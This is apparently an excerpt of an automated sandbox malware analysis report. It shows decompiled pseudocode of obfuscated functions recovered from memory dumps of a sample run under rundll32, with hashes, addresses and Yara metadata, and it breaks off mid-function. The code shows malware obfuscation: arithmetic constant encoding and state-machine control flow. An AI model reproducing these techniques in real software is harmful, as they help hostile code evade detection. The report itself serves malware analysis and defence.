                                                                                                                                                            0x0037f7a3
                                                                                                                                                            0x0037f6b0
                                                                                                                                                            0x0037f898
                                                                                                                                                            0x0037f898
                                                                                                                                                            0x0037f7ba
                                                                                                                                                            0x0037f7c8
                                                                                                                                                            0x0037f7cf
                                                                                                                                                            0x0037f7de
                                                                                                                                                            0x0037f7df
                                                                                                                                                            0x0037f7e4
                                                                                                                                                            0x0037f7f0
                                                                                                                                                            0x0037f837
                                                                                                                                                            0x0037f843
                                                                                                                                                            0x0037f849
                                                                                                                                                            0x0037f858
                                                                                                                                                            0x0037f85c
                                                                                                                                                            0x0037f85e
                                                                                                                                                            0x0037f85f
                                                                                                                                                            0x0037f861
                                                                                                                                                            0x0037f863
                                                                                                                                                            0x0037f86e
                                                                                                                                                            0x0037f875
                                                                                                                                                            0x0037f876
                                                                                                                                                            0x0037f87b
                                                                                                                                                            0x0037f87e
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: kD$)$5$<!$Q0
                                                                                                                                                            • API String ID: 0-101729813
                                                                                                                                                            • Opcode ID: ba676963f8e74b0032d976fbef9f8b6ae04bfed9c8bdfa51077958766acf7bdc
                                                                                                                                                            • Instruction ID: bb4095ed4e8b710540be08281e0e53e9594bc0405a29ebf6c3379de8fb99d79e
                                                                                                                                                            • Opcode Fuzzy Hash: ba676963f8e74b0032d976fbef9f8b6ae04bfed9c8bdfa51077958766acf7bdc
                                                                                                                                                            • Instruction Fuzzy Hash: 3F1201715083809FD3A9CF21C48AA4BFBE2FBC5758F50891DE5D98A260D7B58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003866CA Relevance: 6.5, Strings: 5, Instructions: 240COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003866CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E00385C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E0038DCF7(_v1084, 0x371060, __eflags);
							_t264 = E0038D25E(_v1120);
							_t282 =  *0x393e10; // 0x0
							_t265 =  *0x393e10; // 0x0
							E0038453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E0037A8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E0038DCF7(_v1136, 0x371000, _t319);
									_t289 =  *0x393e10; // 0x0
									_t306 =  *0x393e10; // 0x0
									E003747CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E0037A8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E003913AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}


















































                                                                                                                                                            0x003866ca
                                                                                                                                                            0x003866d0
                                                                                                                                                            0x003866d7
                                                                                                                                                            0x003866df
                                                                                                                                                            0x003866e7
                                                                                                                                                            0x003866ef
                                                                                                                                                            0x003866f7
                                                                                                                                                            0x003866ff
                                                                                                                                                            0x00386711
                                                                                                                                                            0x00386716
                                                                                                                                                            0x0038671c
                                                                                                                                                            0x00386724
                                                                                                                                                            0x00386729
                                                                                                                                                            0x00386731
                                                                                                                                                            0x00386736
                                                                                                                                                            0x0038673e
                                                                                                                                                            0x0038674b
                                                                                                                                                            0x0038674c
                                                                                                                                                            0x00386750
                                                                                                                                                            0x00386758
                                                                                                                                                            0x00386760
                                                                                                                                                            0x00386768
                                                                                                                                                            0x00386770
                                                                                                                                                            0x00386778
                                                                                                                                                            0x00386780
                                                                                                                                                            0x00386788
                                                                                                                                                            0x00386790
                                                                                                                                                            0x00386798
                                                                                                                                                            0x003867a0
                                                                                                                                                            0x003867a8
                                                                                                                                                            0x003867b0
                                                                                                                                                            0x003867b8
                                                                                                                                                            0x003867c0
                                                                                                                                                            0x003867c8
                                                                                                                                                            0x003867d0
                                                                                                                                                            0x003867d8
                                                                                                                                                            0x003867e0
                                                                                                                                                            0x003867e8
                                                                                                                                                            0x003867ed
                                                                                                                                                            0x003867f2
                                                                                                                                                            0x003867f7
                                                                                                                                                            0x003867ff
                                                                                                                                                            0x00386807
                                                                                                                                                            0x0038680f
                                                                                                                                                            0x00386814
                                                                                                                                                            0x0038681c
                                                                                                                                                            0x00386824
                                                                                                                                                            0x0038682c
                                                                                                                                                            0x00386834
                                                                                                                                                            0x0038683c
                                                                                                                                                            0x00386844
                                                                                                                                                            0x00386851
                                                                                                                                                            0x00386855
                                                                                                                                                            0x0038685a
                                                                                                                                                            0x00386862
                                                                                                                                                            0x0038686a
                                                                                                                                                            0x00386872
                                                                                                                                                            0x0038687a
                                                                                                                                                            0x00386888
                                                                                                                                                            0x0038688c
                                                                                                                                                            0x00386894
                                                                                                                                                            0x0038689c
                                                                                                                                                            0x003868a4
                                                                                                                                                            0x003868ac
                                                                                                                                                            0x003868b4
                                                                                                                                                            0x003868bc
                                                                                                                                                            0x003868c4
                                                                                                                                                            0x003868c9
                                                                                                                                                            0x003868ce
                                                                                                                                                            0x003868d8
                                                                                                                                                            0x003868e0
                                                                                                                                                            0x003868e8
                                                                                                                                                            0x003868ed
                                                                                                                                                            0x003868f2
                                                                                                                                                            0x003868fa
                                                                                                                                                            0x00386902
                                                                                                                                                            0x0038690a
                                                                                                                                                            0x00386912
                                                                                                                                                            0x0038691a
                                                                                                                                                            0x00386922
                                                                                                                                                            0x0038692a
                                                                                                                                                            0x00386932
                                                                                                                                                            0x0038693a
                                                                                                                                                            0x00386942
                                                                                                                                                            0x0038694a
                                                                                                                                                            0x00386952
                                                                                                                                                            0x0038695a
                                                                                                                                                            0x00386962
                                                                                                                                                            0x00386967
                                                                                                                                                            0x0038696f
                                                                                                                                                            0x00386977
                                                                                                                                                            0x00386986
                                                                                                                                                            0x00386989
                                                                                                                                                            0x0038698d
                                                                                                                                                            0x00386995
                                                                                                                                                            0x0038699d
                                                                                                                                                            0x003869a5
                                                                                                                                                            0x003869ad
                                                                                                                                                            0x003869b5
                                                                                                                                                            0x003869ba
                                                                                                                                                            0x003869bf
                                                                                                                                                            0x003869c7
                                                                                                                                                            0x003869d7
                                                                                                                                                            0x003869db
                                                                                                                                                            0x003869e3
                                                                                                                                                            0x003869eb
                                                                                                                                                            0x003869f3
                                                                                                                                                            0x003869fb
                                                                                                                                                            0x00386a08
                                                                                                                                                            0x00386a09
                                                                                                                                                            0x00386a0d
                                                                                                                                                            0x00386a15
                                                                                                                                                            0x00386a22
                                                                                                                                                            0x00386a26
                                                                                                                                                            0x00386a2e
                                                                                                                                                            0x00386a36
                                                                                                                                                            0x00386a3e
                                                                                                                                                            0x00386a4c
                                                                                                                                                            0x00386a50
                                                                                                                                                            0x00386a60
                                                                                                                                                            0x00386a74
                                                                                                                                                            0x00386a74
                                                                                                                                                            0x00386a82
                                                                                                                                                            0x00386b0d
                                                                                                                                                            0x00386b16
                                                                                                                                                            0x00386b1e
                                                                                                                                                            0x00386b2f
                                                                                                                                                            0x00386b34
                                                                                                                                                            0x00386b47
                                                                                                                                                            0x00386b6a
                                                                                                                                                            0x00386b7c
                                                                                                                                                            0x00386b81
                                                                                                                                                            0x00386b84
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386a88
                                                                                                                                                            0x00386a8e
                                                                                                                                                            0x00386b06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386a90
                                                                                                                                                            0x00386a90
                                                                                                                                                            0x00386a92
                                                                                                                                                            0x00386a98
                                                                                                                                                            0x00386aa1
                                                                                                                                                            0x00386aa9
                                                                                                                                                            0x00386aba
                                                                                                                                                            0x00386ad2
                                                                                                                                                            0x00386ae5
                                                                                                                                                            0x00386af7
                                                                                                                                                            0x00386afc
                                                                                                                                                            0x00386aff
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386aff
                                                                                                                                                            0x00386a92
                                                                                                                                                            0x00386a8e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00386a82
                                                                                                                                                            0x00386b8e
                                                                                                                                                            0x00386b99
                                                                                                                                                            0x00386b9a
                                                                                                                                                            0x00386ba9
                                                                                                                                                            0x00386bae
                                                                                                                                                            0x00386bb1
                                                                                                                                                            0x00386bb3
                                                                                                                                                            0x00386bb3
                                                                                                                                                            0x00386bb3
                                                                                                                                                            0x00386bc5

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: <E$?c3$Md$a@$yw
                                                                                                                                                            • API String ID: 0-2084988834
                                                                                                                                                            • Opcode ID: 86b9b092eb5d4aeab04b6e7f3bcdffec34cc413377859b2fe43d1d08c56de928
                                                                                                                                                            • Instruction ID: 9b35b840189377bb70c25cbf8302c9dda9cbf417d48d77605f0ac00ae74e4b60
                                                                                                                                                            • Opcode Fuzzy Hash: 86b9b092eb5d4aeab04b6e7f3bcdffec34cc413377859b2fe43d1d08c56de928
                                                                                                                                                            • Instruction Fuzzy Hash: 36C120B24083809FD369DF25D58A81BBBF2FBD4758F108A1DF5A596260D3B98909CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00380001 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00380001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E003820B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E0037CD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E00388606(_v148, 0x371690, __eflags);
				E00372206( &_v128, _t209, _v196, _v200, _t174, E0037EE81(__eflags), _v184);
				_t178 = E0037A8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}





































                                                                                                                                                            0x0038000b
                                                                                                                                                            0x00380012
                                                                                                                                                            0x00380014
                                                                                                                                                            0x00380015
                                                                                                                                                            0x00380016
                                                                                                                                                            0x0038001b
                                                                                                                                                            0x00380020
                                                                                                                                                            0x00380023
                                                                                                                                                            0x0038002d
                                                                                                                                                            0x00380035
                                                                                                                                                            0x0038003a
                                                                                                                                                            0x00380042
                                                                                                                                                            0x00380047
                                                                                                                                                            0x0038004f
                                                                                                                                                            0x00380057
                                                                                                                                                            0x00380065
                                                                                                                                                            0x0038006a
                                                                                                                                                            0x00380070
                                                                                                                                                            0x00380078
                                                                                                                                                            0x00380080
                                                                                                                                                            0x00380085
                                                                                                                                                            0x0038008d
                                                                                                                                                            0x00380095
                                                                                                                                                            0x0038009d
                                                                                                                                                            0x003800a5
                                                                                                                                                            0x003800ad
                                                                                                                                                            0x003800b5
                                                                                                                                                            0x003800bd
                                                                                                                                                            0x003800c5
                                                                                                                                                            0x003800cd
                                                                                                                                                            0x003800d5
                                                                                                                                                            0x003800e2
                                                                                                                                                            0x003800e5
                                                                                                                                                            0x003800e9
                                                                                                                                                            0x003800f1
                                                                                                                                                            0x003800f9
                                                                                                                                                            0x00380109
                                                                                                                                                            0x0038010d
                                                                                                                                                            0x00380115
                                                                                                                                                            0x0038011d
                                                                                                                                                            0x00380129
                                                                                                                                                            0x0038012e
                                                                                                                                                            0x00380134
                                                                                                                                                            0x0038013c
                                                                                                                                                            0x00380144
                                                                                                                                                            0x0038014c
                                                                                                                                                            0x00380151
                                                                                                                                                            0x00380159
                                                                                                                                                            0x00380166
                                                                                                                                                            0x00380167
                                                                                                                                                            0x0038016b
                                                                                                                                                            0x00380173
                                                                                                                                                            0x0038017b
                                                                                                                                                            0x00380189
                                                                                                                                                            0x0038018d
                                                                                                                                                            0x00380195
                                                                                                                                                            0x0038019f
                                                                                                                                                            0x003801ad
                                                                                                                                                            0x003801b2
                                                                                                                                                            0x003801c1
                                                                                                                                                            0x003801c6
                                                                                                                                                            0x003801d5
                                                                                                                                                            0x003801d8
                                                                                                                                                            0x003801dc
                                                                                                                                                            0x003801e4
                                                                                                                                                            0x003801f1
                                                                                                                                                            0x003801f5
                                                                                                                                                            0x003801fd
                                                                                                                                                            0x00380205
                                                                                                                                                            0x0038020d
                                                                                                                                                            0x00380212
                                                                                                                                                            0x0038021a
                                                                                                                                                            0x00380227
                                                                                                                                                            0x0038022b
                                                                                                                                                            0x00380233
                                                                                                                                                            0x0038023d
                                                                                                                                                            0x00380280
                                                                                                                                                            0x00380285
                                                                                                                                                            0x00380289
                                                                                                                                                            0x0038028b
                                                                                                                                                            0x0038028d
                                                                                                                                                            0x0038028f
                                                                                                                                                            0x00380295
                                                                                                                                                            0x00380295
                                                                                                                                                            0x00380297
                                                                                                                                                            0x0038029d
                                                                                                                                                            0x0038029d
                                                                                                                                                            0x0038029f
                                                                                                                                                            0x003802a5
                                                                                                                                                            0x003802a5
                                                                                                                                                            0x003802a1
                                                                                                                                                            0x003802a1
                                                                                                                                                            0x003802a3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003802a3
                                                                                                                                                            0x00380299
                                                                                                                                                            0x00380299
                                                                                                                                                            0x0038029b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038029b
                                                                                                                                                            0x00380291
                                                                                                                                                            0x00380291
                                                                                                                                                            0x00380293
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380293
                                                                                                                                                            0x003802a8
                                                                                                                                                            0x003802a9
                                                                                                                                                            0x003802a9
                                                                                                                                                            0x003802ae
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038023f
                                                                                                                                                            0x00380241
                                                                                                                                                            0x00380257
                                                                                                                                                            0x00380271
                                                                                                                                                            0x00380276
                                                                                                                                                            0x00380279
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380243
                                                                                                                                                            0x00380249
                                                                                                                                                            0x0038024f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038024f
                                                                                                                                                            0x00380249
                                                                                                                                                            0x00380241
                                                                                                                                                            0x0038030f
                                                                                                                                                            0x0038030f
                                                                                                                                                            0x00380315
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380325
                                                                                                                                                            0x00380325
                                                                                                                                                            0x003802b2
                                                                                                                                                            0x003802bb
                                                                                                                                                            0x003802bf
                                                                                                                                                            0x003802c7
                                                                                                                                                            0x003802f3
                                                                                                                                                            0x00380302
                                                                                                                                                            0x00380307
                                                                                                                                                            0x0038030a
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                                                            • API String ID: 0-3810143839
                                                                                                                                                            • Opcode ID: 381a4665687bc05ff23667a00f7f424c7d21d38b86bd3323ec0aa08e6c6dd8e0
                                                                                                                                                            • Instruction ID: e983eb00e9cf312eccb3966939f8b987ca2af5f82d65bf8adfd9eda62407b57a
                                                                                                                                                            • Opcode Fuzzy Hash: 381a4665687bc05ff23667a00f7f424c7d21d38b86bd3323ec0aa08e6c6dd8e0
                                                                                                                                                            • Instruction Fuzzy Hash: 0081A5B15093409BD3A8DF25D589A1FBBE2BBC5718F00995DF1C99A260D3B8C949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00377735 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E00377735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E003820B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
